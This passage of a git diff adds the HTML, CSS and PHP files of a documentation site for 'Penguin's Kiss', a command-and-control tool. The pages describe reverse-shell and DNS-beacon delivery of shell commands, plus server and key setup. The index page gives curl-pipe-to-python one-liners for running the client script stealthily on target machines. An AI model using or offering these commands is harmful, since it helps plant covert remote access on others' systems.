+ <pre>$ TARGET=0,4,57,264 echo hello</pre> + </section> + </div> + </div> + </body> +</html> diff --git a/live/css/control.css b/live/css/control.css new file mode 100644 index 0000000..6a731ab --- /dev/null +++ b/live/css/control.css @@ -0,0 +1,134 @@ +@font-face { + font-family: 'Open Sans'; + src: url('/fonts/opensans.woff2') format('woff2'); + font-display: block; +} +@font-face { + font-family: 'Source Code Pro'; + src: url('/fonts/source-code-pro.woff2') format('woff2'); + font-display: block; +} +body,h1,h2,h3,h4,h5,h6,p,ul { + margin: 0; +} +a { + color: unset; + text-decoration: unset; +} +body { + font-family: 'Open Sans', sans-serif; + background-color: #3cb371; +} +#banner, #navigation { + background-color: #3cb371; +} +#banner { + height: 64px; + display: flex; + flex-direction: row; + align-items: center; + padding: 16px 48px; +} +#logo-img { + height: 64px; +} +#banner-buttons { + flex-grow: 1; + text-align: right; +} +#banner .button { + font-weight: bold; + margin-left: 4px; + padding: 10px 24px; + background-color: #f8f8f8; + border-radius: 8px; + box-shadow: 0px 0px 4px #00000080; +} +#banner .button:hover { + background-color: #f0f0f0; +} +#banner .button:active { + background-color: #f8f8f8; + box-shadow: none; +} +#page { + display: flex; + flex-direction: row; +} +#navigation { + min-width: 192px; + min-height: calc(100vh - 97px); + padding: 0px 32px; + font-family: 'Source Code Pro'; + font-size: 11pt; +} +.nav-heading { + font-family: 'Open Sans'; + font-size: 11.5pt; + font-weight: 700; +} +.nav-section { + list-style: none; + padding: 0; + margin-bottom: 4px; +} +#content { + flex-grow: 1; + padding: 24px 32px; + background-color: #f8f8f8; + border-top-left-radius: 4px; + box-shadow: inset 0px 0px 4px #00000080; + font-size: 11.5pt; +} +#content section { + margin: 16px 0px; +} +#content a { + color: #2d8238; + text-decoration: none; +} +#content a:hover { + color: #33b63f; +} +#content p, #content pre { + margin: 0px 0px 8px; +} +#content pre, #content code { + font-family: 'Source Code Pro', 'Courier New', Courier, monospace; + font-size: 10pt; + background-color: #e8e8e8; +} +#content code { + padding: 0px 2px; +} +#content pre { + padding: 4px 6px; +} +@media screen and (max-width: 750px) { + #banner { + padding: 16px 0; + justify-content: center; + } + #banner-buttons { + display: none; + flex-grow: 0; + } + #banner-logo { + text-align: center; + } + #navigation { + display: none; + min-width: 0; + min-height: 0; + } + #content { + padding: 12px 16px; + border-radius: unset; + font-size: 1.5rem; + } + #content pre, #content code { + font-size: 1.25rem; + white-space: unset; + text-wrap: wrap; + } +}
\ No newline at end of file diff --git a/live/favicon.ico b/live/favicon.ico Binary files differnew file mode 100644 index 0000000..d76f3a3 --- /dev/null +++ b/live/favicon.ico diff --git a/live/fonts/opensans.woff2 b/live/fonts/opensans.woff2 Binary files differnew file mode 100644 index 0000000..f4a0737 --- /dev/null +++ b/live/fonts/opensans.woff2 diff --git a/live/fonts/source-code-pro.woff2 b/live/fonts/source-code-pro.woff2 Binary files differnew file mode 100644 index 0000000..749efbc --- /dev/null +++ b/live/fonts/source-code-pro.woff2 diff --git a/live/hdb.html b/live/hdb.html new file mode 100644 index 0000000..31986c6 --- /dev/null +++ b/live/hdb.html @@ -0,0 +1,105 @@ +<!DOCTYPE html> +<html lang="en"> + <head> + <meta charset="utf-8" /> + <meta name="viewport" content="width=device-width, initial-scale=1.0" /> + <meta name="author" content="Carson Fleming" /> + <meta name="description" content="Harness encrypted client-server communication, asynchronous command distribution, terminal emulation, and support for unlimited clients and controllers with Penguin's Kiss, the ultimate tool to manage remotely controlled devices with security and convenience." /> + <link rel="icon" type="image/x-icon" href="/favicon.ico" /> + <link rel="stylesheet" type="text/css" href="/css/control.css" /> + <title>Hosts Database | Docs | Penguin's Kiss</title> + <link rel="canonical" href="https://c2.pkctl.org/hdb" /> + </head> + <body> + <header id="banner"> + <a id="banner-logo" href="/"> + <img id="logo-img" src="/img/banner.webp" alt="Penguin's Kiss Banner" /> + </a> + <div id="banner-buttons"> + <a class="button" href="https://github.com/cflems/pk">GitHub</a> + <a class="button" href="https://github.com/cflems/pk/releases">Download</a> + </div> + </header> + <div id="page"> + <nav id="navigation"> + <h3 class="nav-heading"><a href="/">About PK</a></h3> + <ul class="nav-section"> + <li><a href="/#download">Downloading</a></li> + <li><a href="/#build">Building</a></li> + <li><a href="/#precompiled">Precompiled</a></li> + </ul> + <h3 class="nav-heading"><a href="/client">Client Config</a></h3> + <ul class="nav-section"> + <li><a href="/client#tts">Time to Sleep</a></li> + <li><a href="/client#bits">RSA Bits</a></li> + </ul> + <h3 class="nav-heading"><a href="/server">Server Config</a></h3> + <ul class="nav-section"> + <li><a href="/server#install">Installing</a></li> + <li><a href="/server#pkctl">PKCTL Usage</a></li> + <li><a href="/server#keygen">Host Key Generation</a></li> + <li><a href="/server#users">Local Users</a></li> + </ul> + <h3 class="nav-heading"><a href="/hdb">Hosts Database</a></h3> + <ul class="nav-section"> + <li><a href="/hdb#format">Format</a></li> + <li><a href="/hdb#keys">Keys Section</a></li> + <!-- Routes here soon. :) --> + </ul> + <h3 class="nav-heading"><a href="/commands">Command Reference</a></h3> + <ul class="nav-section"> + <li><a href="/commands#beacon">beacon</a></li> + <li><a href="/commands#delbeacon">delbeacon</a></li> + <li><a href="/commands#nbeacons">nbeacons</a></li> + <li><a href="/commands#lbeacons">lbeacons</a></li> + <li><a href="/commands#nscreen">nscreen</a></li> + <li><a href="/commands#ncli">ncli</a></li> + <li><a href="/commands#lcli">lcli</a></li> + <li><a href="/commands#lq">lq</a></li> + <li><a href="/commands#cq">cq</a></li> + <li><a href="/commands#show-serverkey">show-serverkey</a></li> + <li><a href="/commands#pty">pty</a></li> + <li><a href="/commands#refresh-hdb">refresh-hdb</a></li> + <li><a href="/commands#tunnel">tunnel</a></li> + <li><a href="/commands#die">die</a></li> + <li><a href="/commands#shell">Shell Commands</a></li> + <li><a href="/commands#target">Targeting</a></li> + </ul> + </nav> + <div id="content"> + <p>Now that we've generated our host key and gotten our server up and running, its + time to publish its public key in a hosts database file so that it can be retrieved + by clients. The TL;DR for this section is to create a file that looks like this:</p> + <pre>{"keys": {"<server ip>": {"n": <number n that python spit out>, "e": 65537}}}</pre> + <p>and upload it to the web somewhere. You can then supply this URL to your clients as + your hosts database. Literally even a PasteBin will work if you use the raw file + URL.</p> + <section id="format"> + <h3>Format</h3> + <p>The hosts database is essentially just a JSON object in which the PK client will + look for specific keys to retrieve information. The basic skeleton looks like + this:</p> + <pre>{"keys": {<keys section>}}</pre> + </section> + <section id="keys"> + <h3>Keys Section</h3> + <p>The keys section is just a mapping from server IPs to key objects, which in + turn are just a way of representing RSA public keys. The keys section supports + multiple server IPs, but currently only one public key per server IP. Its + skeleton looks like the following:</p> + <pre>{"0.1.2.3": {<key object>}, "255.255.255.255": {<key object>}}</pre> + <h4>Key Objects</h4> + <p>A key object is just a modulus and a public exponent, both of which are integers. + The modulus is at key <code>n</code> and the public exponent is at key + <code>e</code>. The public exponent is optional and defaults to + <code>65537</code> if not supplied. These values can be pulled directly from + <code>/etc/pk/server_key.json</code>, but it is important to delete the + <code>d</code> key and its value, as this information needs to remain secret. + </p> + <p>The format of a key object is as follows:</p> + <pre>{"n": 3043289324798327498257285749857984257249857245, "e": 12345}</pre> + </section> + </div> + </div> + </body> +</html> diff --git a/live/img/banner.png b/live/img/banner.png Binary files differnew file mode 100644 index 0000000..1d5d625 --- /dev/null +++ b/live/img/banner.png diff --git a/live/img/banner.webp b/live/img/banner.webp Binary files differnew file mode 100644 index 0000000..dae1345 --- /dev/null +++ b/live/img/banner.webp diff --git a/live/img/logo.png b/live/img/logo.png Binary files differnew file mode 100644 index 0000000..d2c7ce4 --- /dev/null +++ b/live/img/logo.png diff --git a/live/img/logo.webp b/live/img/logo.webp Binary files differnew file mode 100644 index 0000000..e4ab754 --- /dev/null +++ b/live/img/logo.webp diff --git a/live/index.html b/live/index.html new file mode 100644 index 0000000..a32d928 --- /dev/null +++ b/live/index.html @@ -0,0 +1,116 @@ +<!DOCTYPE html> +<html lang="en"> + <head> + <meta charset="utf-8" /> + <meta name="viewport" content="width=device-width, initial-scale=1.0" /> + <meta name="author" content="Carson Fleming" /> + <meta name="description" content="Harness encrypted client-server communication, asynchronous command distribution, terminal emulation, and support for unlimited clients and controllers with Penguin's Kiss, the ultimate tool to manage remotely controlled devices with security and convenience." /> + <link rel="icon" type="image/x-icon" href="/favicon.ico" /> + <link rel="stylesheet" type="text/css" href="/css/control.css" /> + <title>Penguin's Kiss Command & Control Software | Penguin's Kiss</title> + <link rel="canonical" href="https://c2.pkctl.org/" /> + </head> + <body> + <header id="banner"> + <a id="banner-logo" href="/"> + <img id="logo-img" src="/img/banner.webp" alt="Penguin's Kiss Banner" /> + </a> + <div id="banner-buttons"> + <a class="button" href="https://github.com/cflems/pk">GitHub</a> + <a class="button" href="https://github.com/cflems/pk/releases">Download</a> + </div> + </header> + <div id="page"> + <nav id="navigation"> + <h3 class="nav-heading"><a href="/">About PK</a></h3> + <ul class="nav-section"> + <li><a href="/#download">Downloading</a></li> + <li><a href="/#build">Building</a></li> + <li><a href="/#precompiled">Precompiled</a></li> + </ul> + <h3 class="nav-heading"><a href="/client">Client Config</a></h3> + <ul class="nav-section"> + <li><a href="/client#tts">Time to Sleep</a></li> + <li><a href="/client#bits">RSA Bits</a></li> + </ul> + <h3 class="nav-heading"><a href="/server">Server Config</a></h3> + <ul class="nav-section"> + <li><a href="/server#install">Installing</a></li> + <li><a href="/server#pkctl">PKCTL Usage</a></li> + <li><a href="/server#keygen">Host Key Generation</a></li> + <li><a href="/server#users">Local Users</a></li> + </ul> + <h3 class="nav-heading"><a href="/hdb">Hosts Database</a></h3> + <ul class="nav-section"> + <li><a href="/hdb#format">Format</a></li> + <li><a href="/hdb#keys">Keys Section</a></li> + <!-- Routes here soon. :) --> + </ul> + <h3 class="nav-heading"><a href="/commands">Command Reference</a></h3> + <ul class="nav-section"> + <li><a href="/commands#beacon">beacon</a></li> + <li><a href="/commands#delbeacon">delbeacon</a></li> + <li><a href="/commands#nbeacons">nbeacons</a></li> + <li><a href="/commands#lbeacons">lbeacons</a></li> + <li><a href="/commands#nscreen">nscreen</a></li> + <li><a href="/commands#ncli">ncli</a></li> + <li><a href="/commands#lcli">lcli</a></li> + <li><a href="/commands#lq">lq</a></li> + <li><a href="/commands#cq">cq</a></li> + <li><a href="/commands#show-serverkey">show-serverkey</a></li> + <li><a href="/commands#pty">pty</a></li> + <li><a href="/commands#refresh-hdb">refresh-hdb</a></li> + <li><a href="/commands#tunnel">tunnel</a></li> + <li><a href="/commands#die">die</a></li> + <li><a href="/commands#shell">Shell Commands</a></li> + <li><a href="/commands#target">Targeting</a></li> + </ul> + </nav> + <div id="content"> + <p>Penguin's Kiss is command and control software designed to accomodate a large + number of clients and controllers at once. Multiple channels are available for + end-to-end encrypted delivery of shell commands, including direct TCP reverse + shell, DNS beacon, and beacon-triggered direct connection. All information is sent + encrypted, either by padded RSA or by one-time pad exchanged over RSA (this helps + to keep short data snippets responsive and avoid ballooning message size). In the + future, some work may be done to incorporate elliptic curve cryptography and + one-time session keys utilizing some symmetric cipher (likely AES).</p> + <section id="download"> + <h3>Downloading PK</h3> + <p>The quickest way to download is via the button in the top right. This will take + you to the latest release on + <a href="https://github.com/cflems/pk">GitHub</a>. You can also clone the + <a href="https://github.com/cflems/pk/tree/master">master</a> (pseudo-stable) + or + <a href="https://github.com/cflems/pk/tree/develop">develop</a> (unstable) + branches to receive feature updates before they are bundled into a full + release.</p> + </section> + <section id="build"> + <h3>Building PK</h3> + <p>PK doesn't require much in the way of compilation, just bundling into a + single script that can be distributed or run. This functionality is written in + the makefile for easy access, so fetching and compilation should be as simple + as:</p> + <pre># or tar -xzf pk.tgz if you've downloaded an archive +git clone git@github.com:cflems/pk.git +cd pk +make</pre> + <p>Your built artifacts will be <code>pkcli.py</code> and <code>pkd.py</code>. + Building is required before PK can be run for the first time.</p> + </section> + <section id="precompiled"> + <h3>Precompiled Client Scripts</h3> + <p>Since cloning and building the latest version isn't the stealthiest + procedure to execute on a client machine, prebuilt versions of the latest + client script will be hosted in the several locations and can be executed + without meaningful process footprint as follows:</p> + <pre>curl -s https://dl.pkctl.org/pk.py | ENV=... python3 -</pre> + <pre>curl -s https://war.cflems.net/pk.py | ENV=... python3 -</pre> + <p>You may wish to host your own, however, in order to tweak the default values + to your needs and avoid feeding them via enviornment variables.</p> + </section> + </div> + </div> + </body> +</html> diff --git a/live/server.html b/live/server.html new file mode 100644 index 0000000..c7dce69 --- /dev/null +++ b/live/server.html @@ -0,0 +1,131 @@ +<!DOCTYPE html> +<html lang="en"> + <head> + <meta charset="utf-8" /> + <meta name="viewport" content="width=device-width, initial-scale=1.0" /> + <meta name="author" content="Carson Fleming" /> + <meta name="description" content="Harness encrypted client-server communication, asynchronous command distribution, terminal emulation, and support for unlimited clients and controllers with Penguin's Kiss, the ultimate tool to manage remotely controlled devices with security and convenience." /> + <link rel="icon" type="image/x-icon" href="/favicon.ico" /> + <link rel="stylesheet" type="text/css" href="/css/control.css" /> + <title>Server Configuration | Docs | Penguin's Kiss</title> + <link rel="canonical" href="https://c2.pkctl.org/server" /> + </head> + <body> + <header id="banner"> + <a id="banner-logo" href="/"> + <img id="logo-img" src="/img/banner.webp" alt="Penguin's Kiss Banner" /> + </a> + <div id="banner-buttons"> + <a class="button" href="https://github.com/cflems/pk">GitHub</a> + <a class="button" href="https://github.com/cflems/pk/releases">Download</a> + </div> + </header> + <div id="page"> + <nav id="navigation"> + <h3 class="nav-heading"><a href="/">About PK</a></h3> + <ul class="nav-section"> + <li><a href="/#download">Downloading</a></li> + <li><a href="/#build">Building</a></li> + <li><a href="/#precompiled">Precompiled</a></li> + </ul> + <h3 class="nav-heading"><a href="/client">Client Config</a></h3> + <ul class="nav-section"> + <li><a href="/client#tts">Time to Sleep</a></li> + <li><a href="/client#bits">RSA Bits</a></li> + </ul> + <h3 class="nav-heading"><a href="/server">Server Config</a></h3> + <ul class="nav-section"> + <li><a href="/server#install">Installing</a></li> + <li><a href="/server#pkctl">PKCTL Usage</a></li> + <li><a href="/server#keygen">Host Key Generation</a></li> + <li><a href="/server#users">Local Users</a></li> + </ul> + <h3 class="nav-heading"><a href="/hdb">Hosts Database</a></h3> + <ul class="nav-section"> + <li><a href="/hdb#format">Format</a></li> + <li><a href="/hdb#keys">Keys Section</a></li> + <!-- Routes here soon. :) --> + </ul> + <h3 class="nav-heading"><a href="/commands">Command Reference</a></h3> + <ul class="nav-section"> + <li><a href="/commands#beacon">beacon</a></li> + <li><a href="/commands#delbeacon">delbeacon</a></li> + <li><a href="/commands#nbeacons">nbeacons</a></li> + <li><a href="/commands#lbeacons">lbeacons</a></li> + <li><a href="/commands#nscreen">nscreen</a></li> + <li><a href="/commands#ncli">ncli</a></li> + <li><a href="/commands#lcli">lcli</a></li> + <li><a href="/commands#lq">lq</a></li> + <li><a href="/commands#cq">cq</a></li> + <li><a href="/commands#show-serverkey">show-serverkey</a></li> + <li><a href="/commands#pty">pty</a></li> + <li><a href="/commands#refresh-hdb">refresh-hdb</a></li> + <li><a href="/commands#tunnel">tunnel</a></li> + <li><a href="/commands#die">die</a></li> + <li><a href="/commands#shell">Shell Commands</a></li> + <li><a href="/commands#target">Targeting</a></li> + </ul> + </nav> + <div id="content"> + <p>Once your PK scripts are built very little is required to run the server as a local + user, you can literally just do:</p> + <pre>python3 pkctl.py start +python3 pkctl.py attach</pre> + <p>and have yourself a simple instance up and running ready to run commands. Therefore + the rest of this section will be dedicated to getting PK running in the background + as a systemd service under its own user, and letting multiple system users attach + to the daemon at once if desired.</p> + <section id="install"> + <h3>Installing</h3> + <p>Once again the makefile mostly has you covered here, all you need to do is:</p> + <pre>sudo make install</pre> + <p>and the makefile will set up a dedicated service user and group called + <code>pkd</code> which controls access to the daemon and its resources, as well + as setting up the pk server as a systemd service called <code>pk</code>. This + will also start the pk server and enable it on startup.</p> + </section> + <section id="pkctl"> + <h3>PKCTL Usage</h3> + <p>Once installed, you can use the following commands to interface with the pk + daemon controller:</p> + <p><code>systemctl start|stop|restart pk</code> — this controls the + daemon's life cycle.</p> + <p><code>pkctl attach</code> — this starts an interactive session with the + daemon, allowing you to control and interface with clients.</p> + </section> + <section id="keygen"> + <h3>Host Key Generation</h3> + <p>Once you've installed the pk server you're going to want to change its + host key away from the default one which is used for testing purposes and is + widely available (read: not secure at all).</p> + <p>This is probably the only complicated part of the whole guide, mostly because + I haven't yet built a cute little utility to do it for you yet (I should + at some point). You're going to need to do the following (in your pk + directory):</p> + <pre>python3 +>>> import crypto +>>> p,q,n,e,d = crypto.Crypto.keygen(4096) +>>> n</pre> + <p>Copy the number that python spits out here.</p> + <pre> +>>> d</pre> + <p>Also copy this number. Keep these two handy as we'll need them later. + Now open <code>/etc/pk/server_key.json</code> in your favorite editor and make + it read as follows (you can wipe out the current contents):</p> + <pre>{"n": <the number n we got from python>, "d": <the number d we got from python>, "e": 65537}</pre> + <p>At this point we're almost done, we just have to restart pk to reflect the + changes, so run:</p> + <pre>sudo systemctl restart pk</pre> + <p>and you should be good to go.</p> + </section> + <section id="users"> + <h3>Local Users</h3> + <p>To allow non-root users on your system to use <code>pkctl attach</code>, you + will need to add them to the <code>pkd</code> user group. This is remarkably + simple to do on any unix system, just run:</p> + <pre>adduser [username] pkd</pre> + </section> + </div> + </div> + </body> +</html> diff --git a/makefile b/makefile new file mode 100644 index 0000000..4c90120 --- /dev/null +++ b/makefile @@ -0,0 +1,6 @@ +all: + php -f index.php >live/index.html + php -f client.php >live/client.html + php -f server.php >live/server.html + php -f hdb.php >live/hdb.html + php -f commands.php >live/commands.html diff --git a/server.php b/server.php new file mode 100644 index 0000000..4cbd1f0 --- /dev/null +++ b/server.php @@ -0,0 +1,74 @@ +<!DOCTYPE html> +<html lang="en"> + <head> +<?php +require('include/meta.php'); +?> + <title>Server Configuration | Docs | Penguin's Kiss</title> + <link rel="canonical" href="https://c2.pkctl.org/server" /> + </head> +<?php +require('include/header.php'); +?> + <p>Once your PK scripts are built very little is required to run the server as a local + user, you can literally just do:</p> + <pre>python3 pkctl.py start +python3 pkctl.py attach</pre> + <p>and have yourself a simple instance up and running ready to run commands. Therefore + the rest of this section will be dedicated to getting PK running in the background + as a systemd service under its own user, and letting multiple system users attach + to the daemon at once if desired.</p> + <section id="install"> + <h3>Installing</h3> + <p>Once again the makefile mostly has you covered here, all you need to do is:</p> + <pre>sudo make install</pre> + <p>and the makefile will set up a dedicated service user and group called + <code>pkd</code> which controls access to the daemon and its resources, as well + as setting up the pk server as a systemd service called <code>pk</code>. This + will also start the pk server and enable it on startup.</p> + </section> + <section id="pkctl"> + <h3>PKCTL Usage</h3> + <p>Once installed, you can use the following commands to interface with the pk + daemon controller:</p> + <p><code>systemctl start|stop|restart pk</code> — this controls the + daemon's life cycle.</p> + <p><code>pkctl attach</code> — this starts an interactive session with the + daemon, allowing you to control and interface with clients.</p> + </section> + <section id="keygen"> + <h3>Host Key Generation</h3> + <p>Once you've installed the pk server you're going to want to change its + host key away from the default one which is used for testing purposes and is + widely available (read: not secure at all).</p> + <p>This is probably the only complicated part of the whole guide, mostly because + I haven't yet built a cute little utility to do it for you yet (I should + at some point). You're going to need to do the following (in your pk + directory):</p> + <pre>python3 +>>> import crypto +>>> p,q,n,e,d = crypto.Crypto.keygen(4096) +>>> n</pre> + <p>Copy the number that python spits out here.</p> + <pre> +>>> d</pre> + <p>Also copy this number. Keep these two handy as we'll need them later. + Now open <code>/etc/pk/server_key.json</code> in your favorite editor and make + it read as follows (you can wipe out the current contents):</p> + <pre>{"n": <the number n we got from python>, "d": <the number d we got from python>, "e": 65537}</pre> + <p>At this point we're almost done, we just have to restart pk to reflect the + changes, so run:</p> + <pre>sudo systemctl restart pk</pre> + <p>and you should be good to go.</p> + </section> + <section id="users"> + <h3>Local Users</h3> + <p>To allow non-root users on your system to use <code>pkctl attach</code>, you + will need to add them to the <code>pkd</code> user group. This is remarkably + simple to do on any unix system, just run:</p> + <pre>adduser [username] pkd</pre> + </section> +<?php +require('include/footer.php'); +?> +</html> |
